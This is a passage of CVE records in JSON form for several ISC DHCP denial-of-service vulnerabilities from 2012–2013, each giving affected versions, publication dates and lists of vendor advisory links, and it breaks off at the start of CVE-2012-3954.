"url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00168.html"
},
{
"name": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/",
"refsource": "CONFIRM",
"url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/"
},
{
"name": "https://kb.isc.org/article/AA-01334",
"refsource": "CONFIRM",
"url": "https://kb.isc.org/article/AA-01334"
},
{
"name": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/",
"refsource": "CONFIRM",
"url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/"
},
{
"name": "FEDORA-2016-0c5bb21bf1",
"refsource": "FEDORA",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/175594.html"
},
{
"name": "DSA-3442",
"refsource": "DEBIAN",
"url": "http://www.debian.org/security/2016/dsa-3442"
},
{
"name": "USN-2868-1",
"refsource": "UBUNTU",
"url": "http://www.ubuntu.com/usn/USN-2868-1"
},
{
"name": "FEDORA-2016-adb533a418",
"refsource": "FEDORA",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/176031.html"
},
{
"name": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html",
"refsource": "CONFIRM",
"url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html"
},
{
"name": "80703",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/80703"
},
{
"name": "openSUSE-SU-2016:0601",
"refsource": "SUSE",
"url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00162.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2015-8605",
"datePublished": "2016-01-14T22:00:00.000Z",
"dateReserved": "2015-12-17T00:00:00.000Z",
"dateUpdated": "2024-08-06T08:20:43.591Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-2494 (GCVE-0-2013-2494)
Vulnerability from cvelistv5 – Published: 2013-03-28 16:00 – Updated: 2024-09-16 19:52
VLAI?
Summary
libdns in ISC DHCP 4.2.x before 4.2.5-P1 allows remote name servers to cause a denial of service (memory consumption) via vectors involving a regular expression, as demonstrated by a memory-exhaustion attack against a machine running a dhcpd process, a related issue to CVE-2013-2266.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T15:44:31.973Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.isc.org/article/AA-00880/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "libdns in ISC DHCP 4.2.x before 4.2.5-P1 allows remote name servers to cause a denial of service (memory consumption) via vectors involving a regular expression, as demonstrated by a memory-exhaustion attack against a machine running a dhcpd process, a related issue to CVE-2013-2266."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-03-28T16:00:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.isc.org/article/AA-00880/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-2494",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "libdns in ISC DHCP 4.2.x before 4.2.5-P1 allows remote name servers to cause a denial of service (memory consumption) via vectors involving a regular expression, as demonstrated by a memory-exhaustion attack against a machine running a dhcpd process, a related issue to CVE-2013-2266."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.isc.org/article/AA-00880/",
"refsource": "CONFIRM",
"url": "https://kb.isc.org/article/AA-00880/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-2494",
"datePublished": "2013-03-28T16:00:00.000Z",
"dateReserved": "2013-03-07T00:00:00.000Z",
"dateUpdated": "2024-09-16T19:52:30.979Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2012-3955 (GCVE-0-2012-3955)
Vulnerability from cvelistv5 – Published: 2012-09-14 10:00 – Updated: 2024-08-06 20:21
VLAI?
Summary
ISC DHCP 4.1.x before 4.1-ESV-R7 and 4.2.x before 4.2.4-P2 allows remote attackers to cause a denial of service (daemon crash) in opportunistic circumstances by establishing an IPv6 lease in an environment where the lease expiration time is later reduced.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||
Date Public ?
2012-09-12 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T20:21:04.060Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "FEDORA-2012-14149",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088220.html"
},
{
"name": "openSUSE-SU-2012:1252",
"tags": [
"vendor-advisory",
"x_refsource_SUSE",
"x_transferred"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00103.html"
},
{
"name": "USN-1571-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU",
"x_transferred"
],
"url": "http://www.ubuntu.com/usn/USN-1571-1"
},
{
"name": "openSUSE-SU-2012:1234",
"tags": [
"vendor-advisory",
"x_refsource_SUSE",
"x_transferred"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00088.html"
},
{
"name": "DSA-2551",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "http://www.debian.org/security/2012/dsa-2551"
},
{
"name": "51318",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/51318"
},
{
"name": "MDVSA-2012:153",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA",
"x_transferred"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:153"
},
{
"name": "FEDORA-2012-13910",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/086992.html"
},
{
"name": "55530",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/55530"
},
{
"name": "FEDORA-2012-14076",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-October/088882.html"
},
{
"name": "RHSA-2013:0504",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "http://rhn.redhat.com/errata/RHSA-2013-0504.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://blogs.oracle.com/sunsecurity/entry/cve_2012_3955_denial_of"
},
{
"name": "openSUSE-SU-2012:1254",
"tags": [
"vendor-advisory",
"x_refsource_SUSE",
"x_transferred"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00105.html"
},
{
"name": "GLSA-201301-06",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO",
"x_transferred"
],
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.isc.org/article/AA-00779"
},
{
"name": "1027528",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1027528"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2012-09-12T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "ISC DHCP 4.1.x before 4.1-ESV-R7 and 4.2.x before 4.2.4-P2 allows remote attackers to cause a denial of service (daemon crash) in opportunistic circumstances by establishing an IPv6 lease in an environment where the lease expiration time is later reduced."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2012-09-29T09:00:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "FEDORA-2012-14149",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088220.html"
},
{
"name": "openSUSE-SU-2012:1252",
"tags": [
"vendor-advisory",
"x_refsource_SUSE"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00103.html"
},
{
"name": "USN-1571-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU"
],
"url": "http://www.ubuntu.com/usn/USN-1571-1"
},
{
"name": "openSUSE-SU-2012:1234",
"tags": [
"vendor-advisory",
"x_refsource_SUSE"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00088.html"
},
{
"name": "DSA-2551",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "http://www.debian.org/security/2012/dsa-2551"
},
{
"name": "51318",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/51318"
},
{
"name": "MDVSA-2012:153",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:153"
},
{
"name": "FEDORA-2012-13910",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/086992.html"
},
{
"name": "55530",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/55530"
},
{
"name": "FEDORA-2012-14076",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-October/088882.html"
},
{
"name": "RHSA-2013:0504",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "http://rhn.redhat.com/errata/RHSA-2013-0504.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://blogs.oracle.com/sunsecurity/entry/cve_2012_3955_denial_of"
},
{
"name": "openSUSE-SU-2012:1254",
"tags": [
"vendor-advisory",
"x_refsource_SUSE"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00105.html"
},
{
"name": "GLSA-201301-06",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO"
],
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.isc.org/article/AA-00779"
},
{
"name": "1027528",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1027528"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-3955",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "ISC DHCP 4.1.x before 4.1-ESV-R7 and 4.2.x before 4.2.4-P2 allows remote attackers to cause a denial of service (daemon crash) in opportunistic circumstances by establishing an IPv6 lease in an environment where the lease expiration time is later reduced."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "FEDORA-2012-14149",
"refsource": "FEDORA",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088220.html"
},
{
"name": "openSUSE-SU-2012:1252",
"refsource": "SUSE",
"url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00103.html"
},
{
"name": "USN-1571-1",
"refsource": "UBUNTU",
"url": "http://www.ubuntu.com/usn/USN-1571-1"
},
{
"name": "openSUSE-SU-2012:1234",
"refsource": "SUSE",
"url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00088.html"
},
{
"name": "DSA-2551",
"refsource": "DEBIAN",
"url": "http://www.debian.org/security/2012/dsa-2551"
},
{
"name": "51318",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/51318"
},
{
"name": "MDVSA-2012:153",
"refsource": "MANDRIVA",
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:153"
},
{
"name": "FEDORA-2012-13910",
"refsource": "FEDORA",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/086992.html"
},
{
"name": "55530",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/55530"
},
{
"name": "FEDORA-2012-14076",
"refsource": "FEDORA",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-October/088882.html"
},
{
"name": "RHSA-2013:0504",
"refsource": "REDHAT",
"url": "http://rhn.redhat.com/errata/RHSA-2013-0504.html"
},
{
"name": "https://blogs.oracle.com/sunsecurity/entry/cve_2012_3955_denial_of",
"refsource": "CONFIRM",
"url": "https://blogs.oracle.com/sunsecurity/entry/cve_2012_3955_denial_of"
},
{
"name": "openSUSE-SU-2012:1254",
"refsource": "SUSE",
"url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00105.html"
},
{
"name": "GLSA-201301-06",
"refsource": "GENTOO",
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"name": "https://kb.isc.org/article/AA-00779",
"refsource": "CONFIRM",
"url": "https://kb.isc.org/article/AA-00779"
},
{
"name": "1027528",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1027528"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-3955",
"datePublished": "2012-09-14T10:00:00.000Z",
"dateReserved": "2012-07-11T00:00:00.000Z",
"dateUpdated": "2024-08-06T20:21:04.060Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2012-3571 (GCVE-0-2012-3571)
Vulnerability from cvelistv5 – Published: 2012-07-25 10:00 – Updated: 2024-08-06 20:13
VLAI?
Summary
ISC DHCP 4.1.2 through 4.2.4 and 4.1-ESV before 4.1-ESV-R6 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed client identifier.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||
Date Public ?
2012-07-24 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T20:13:51.326Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.isc.org/article/AA-00712"
},
{
"name": "DSA-2516",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "http://www.debian.org/security/2012/dsa-2516"
},
{
"name": "RHSA-2012:1141",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
},
{
"name": "MDVSA-2012:116",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA",
"x_transferred"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
},
{
"name": "openSUSE-SU-2012:1006",
"tags": [
"vendor-advisory",
"x_refsource_SUSE",
"x_transferred"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10761"
},
{
"name": "MDVSA-2012:115",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA",
"x_transferred"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
},
{
"name": "DSA-2519",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "http://www.debian.org/security/2012/dsa-2519"
},
{
"name": "USN-1519-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU",
"x_transferred"
],
"url": "http://www.ubuntu.com/usn/USN-1519-1"
},
{
"name": "GLSA-201301-06",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO",
"x_transferred"
],
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"name": "RHSA-2012:1140",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "http://rhn.redhat.com/errata/RHSA-2012-1140.html"
},
{
"name": "54665",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/54665"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2012-07-24T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "ISC DHCP 4.1.2 through 4.2.4 and 4.1-ESV before 4.1-ESV-R6 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed client identifier."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-12-29T21:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.isc.org/article/AA-00712"
},
{
"name": "DSA-2516",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "http://www.debian.org/security/2012/dsa-2516"
},
{
"name": "RHSA-2012:1141",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
},
{
"name": "MDVSA-2012:116",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
},
{
"name": "openSUSE-SU-2012:1006",
"tags": [
"vendor-advisory",
"x_refsource_SUSE"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10761"
},
{
"name": "MDVSA-2012:115",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
},
{
"name": "DSA-2519",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "http://www.debian.org/security/2012/dsa-2519"
},
{
"name": "USN-1519-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU"
],
"url": "http://www.ubuntu.com/usn/USN-1519-1"
},
{
"name": "GLSA-201301-06",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO"
],
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"name": "RHSA-2012:1140",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "http://rhn.redhat.com/errata/RHSA-2012-1140.html"
},
{
"name": "54665",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/54665"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-3571",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "ISC DHCP 4.1.2 through 4.2.4 and 4.1-ESV before 4.1-ESV-R6 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed client identifier."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html",
"refsource": "CONFIRM",
"url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
},
{
"name": "https://kb.isc.org/article/AA-00712",
"refsource": "CONFIRM",
"url": "https://kb.isc.org/article/AA-00712"
},
{
"name": "DSA-2516",
"refsource": "DEBIAN",
"url": "http://www.debian.org/security/2012/dsa-2516"
},
{
"name": "RHSA-2012:1141",
"refsource": "REDHAT",
"url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
},
{
"name": "MDVSA-2012:116",
"refsource": "MANDRIVA",
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
},
{
"name": "openSUSE-SU-2012:1006",
"refsource": "SUSE",
"url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
},
{
"name": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10761",
"refsource": "CONFIRM",
"url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10761"
},
{
"name": "MDVSA-2012:115",
"refsource": "MANDRIVA",
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
},
{
"name": "DSA-2519",
"refsource": "DEBIAN",
"url": "http://www.debian.org/security/2012/dsa-2519"
},
{
"name": "USN-1519-1",
"refsource": "UBUNTU",
"url": "http://www.ubuntu.com/usn/USN-1519-1"
},
{
"name": "GLSA-201301-06",
"refsource": "GENTOO",
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"name": "RHSA-2012:1140",
"refsource": "REDHAT",
"url": "http://rhn.redhat.com/errata/RHSA-2012-1140.html"
},
{
"name": "54665",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/54665"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-3571",
"datePublished": "2012-07-25T10:00:00.000Z",
"dateReserved": "2012-06-14T00:00:00.000Z",
"dateUpdated": "2024-08-06T20:13:51.326Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2012-3570 (GCVE-0-2012-3570)
Vulnerability from cvelistv5 – Published: 2012-07-25 10:00 – Updated: 2024-08-06 20:13
VLAI?
Summary
Buffer overflow in ISC DHCP 4.2.x before 4.2.4-P1, when DHCPv6 mode is enabled, allows remote attackers to cause a denial of service (segmentation fault and daemon exit) via a crafted client identifier parameter.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Date Public ?
2012-07-24 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T20:13:50.567Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "openSUSE-SU-2012:1006",
"tags": [
"vendor-advisory",
"x_refsource_SUSE",
"x_transferred"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
},
{
"name": "MDVSA-2012:115",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA",
"x_transferred"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
},
{
"name": "GLSA-201301-06",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO",
"x_transferred"
],
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.isc.org/article/AA-00714"
},
{
"name": "54665",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/54665"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2012-07-24T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in ISC DHCP 4.2.x before 4.2.4-P1, when DHCPv6 mode is enabled, allows remote attackers to cause a denial of service (segmentation fault and daemon exit) via a crafted client identifier parameter."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-11-25T19:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "openSUSE-SU-2012:1006",
"tags": [
"vendor-advisory",
"x_refsource_SUSE"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
},
{
"name": "MDVSA-2012:115",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
},
{
"name": "GLSA-201301-06",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO"
],
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.isc.org/article/AA-00714"
},
{
"name": "54665",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/54665"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-3570",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in ISC DHCP 4.2.x before 4.2.4-P1, when DHCPv6 mode is enabled, allows remote attackers to cause a denial of service (segmentation fault and daemon exit) via a crafted client identifier parameter."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "openSUSE-SU-2012:1006",
"refsource": "SUSE",
"url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
},
{
"name": "MDVSA-2012:115",
"refsource": "MANDRIVA",
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
},
{
"name": "GLSA-201301-06",
"refsource": "GENTOO",
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"name": "https://kb.isc.org/article/AA-00714",
"refsource": "CONFIRM",
"url": "https://kb.isc.org/article/AA-00714"
},
{
"name": "54665",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/54665"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-3570",
"datePublished": "2012-07-25T10:00:00.000Z",
"dateReserved": "2012-06-14T00:00:00.000Z",
"dateUpdated": "2024-08-06T20:13:50.567Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2012-3954 (GCVE-0-2012-3954)
Vulnerability from cvelistv5 – Published: 2012-07-25 10:00 – Updated: 2024-08-06 20:21
VLAI?
Summary
Multiple memory leaks in ISC DHCP 4.1.x and 4.2.x before 4.2.4-P1 and 4.1-ESV before 4.1-ESV-R6 allow remote attackers to cause a denial of service (memory consumption) by sending many requests.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||||||||||||||||||||
